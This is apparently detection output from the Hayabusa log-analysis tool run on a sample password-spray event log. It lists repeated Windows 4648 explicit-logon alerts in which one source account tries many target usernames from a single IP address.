DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:27:59.721 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:00.795 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:01.865 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:02.941 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:04.015 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:05.097 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:06.182 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:07.239 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:08.315 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:09.399 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:10.468 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:11.549 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:12.621 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:13.709 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:14.769 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:15.849 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:16.918 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:17.999 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:19.068 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:20.129 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:21.201 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:22.250 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:23.338 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:24.404 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:25.468 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:26.529 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:27.607 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:28.691 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:29.753 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:30.838 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:31.910 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:32.983 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:34.067 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:35.146 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:36.239 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:37.334 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:38.403 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:39.463 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:40.530 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:41.608 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:42.669 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:43.731 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:44.801 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:45.880 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:46.969 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:48.042 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:49.108 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:50.156 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:51.239 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:52.302 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:53.366 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:54.441 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:55.503 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:56.579 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:57.650 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:58.722 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:28:59.800 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:00.872 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:01.934 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:02.995 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:04.075 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:05.156 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:06.238 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:07.308 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:08.370 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:09.433 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:10.523 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:11.590 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:12.649 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:13.722 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:14.787 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:15.846 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:16.940 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:18.019 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:19.076 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:20.162 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:21.257 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:22.327 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:23.410 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:24.477 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:29:25.557 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: 
